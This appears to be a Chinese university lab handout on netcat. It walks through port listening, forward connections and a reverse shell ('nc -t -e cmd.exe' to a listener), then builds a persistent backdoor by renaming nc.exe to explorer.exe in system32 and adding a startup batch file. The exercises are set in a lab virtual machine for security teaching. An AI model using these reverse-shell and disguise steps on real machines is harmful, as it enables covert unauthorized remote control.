NC實验指导书.docVIP

实验三 利用NC发动网络入侵 实验目的 nc.exe全称NetCat，被誉为网络安全界的“瑞士军刀”。nc.exe是一个非常标准的telnet客户端工具，是在CMD.EXE下运行的小程序。它的功能非常强大，经常被黑客用来做后门或者是网络扫描及监听的工具，是黑客们的必备武器之一。 通过本次实验，希望同学们能掌握nc的用法及简单批处理文件的编辑。 实验环境 1．安装Windows2000/2003Server/XP操作系统的PC计算机一台。 2． PC机上要安装虚拟机，并配有不打补丁的操作系统。 实验原理 将nc.exe放到C盘根目录下，在CMD.EXE下输入*nc.exe -h*，即可看到各参数的使用方法。（CTRL+C结束NC 程序执行） 命令参数翻译如下： -d 后台模式 e程序重定向，一旦连接，就执行 [危险!!] -h 帮助信息 -i 延时的间隔 -l 监听模式，用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址，不能用DNS -o 记录16进制的传输 -p 本地端口号 -s 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出--用两个-v可得到更详细的内容 -w 超时的时间，将输入输出关掉 -z --用于扫描时，端口的表示方法可写为M-N的范围格式。 实验步骤 一、监听本地端口 将nc.exe 放到本地机器C盘根目录下，监听本地999端口，具体操作方式如下： 这里如果是本机的话，可以省去主机名或IP，即不写127.0.0.1，这时默认就是本机。 在没有标明的情况下是监听TCP协议的999端口，即打开999端口并处于监听状态。如果想监听UDP协议的999端口，语法如下： C：\ nc -l –u –p 999 如果想持续监听，语法如下： C：\ nc -L –u –p 999 另外运行一个CMD.EXE程序验证一下结果，看是不是真的监听我们本机的90端口，结果如下图： 二、正向链接 事先将nc.exe放到虚拟机C盘下，并运行nc，监听999端口。（此处将其视为服务器端） 在本机上也运行nc，链接虚拟机的999端口。（本机可视为客户端） 注释：192.168.1.3为虚拟机IP 查看虚拟机，并回答“I am fine, thank you!”. 本机接收如下： 三、反向链接 所谓反向链接,简单的说就是目标机主动来链接黑客的机子,而不用黑客主动去找他,当目标机上线后会自动来链接黑客设定的端口。 假设黑客机器（本机）的IP为192.168.1.2，一直监听2345端口：nc -l -p 2345。 在目标机（即虚拟机）上就可以用这样的命令来实现反弹:nc -t -e cmd.exe 192.168.1.2 2345，它的意思就是把cmd定向在192.168.1.2 (本地机器)的2345端口上。 当目标机一上线，则主动与黑客计算机就链接，本地机器显示链接成功，如果运行“dir”命令，则显示的应该是虚拟机硬盘上的信息。 四、用nc反向链接功能构建后门 事先将nc.exe 文件拷贝到虚拟机c:\winnt\system32 文件夹下，为了避免引起怀疑，将其重命名为“explorer.exe”。 2. 编辑一个bat文件 在虚拟机上新建一个txt文件，取名为“1.txt”，在其中输入以下内容，如下图所示： 单击菜单栏中的“文件”命令，在弹出的下拉菜单中选择“另存为”命令，弹出“另存为”对话框，如下图所示，按照下图将1.txt文件转存为1.bat批处理文件。 3. 将1.bat复制到“All user”的启动文件夹 再将1.bat复制到“All user”的启动文件夹。将“1.bat”文件复制到“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”文件夹下，如下图所示。 在本机上监听2345端口 重启虚拟机上的计算机 重启计算机，用户进入计算机后，计算机会自动执行“1.bat”脚本，会启动nc程序从而在2345端口与192.168.1.2计算机建立链接。  7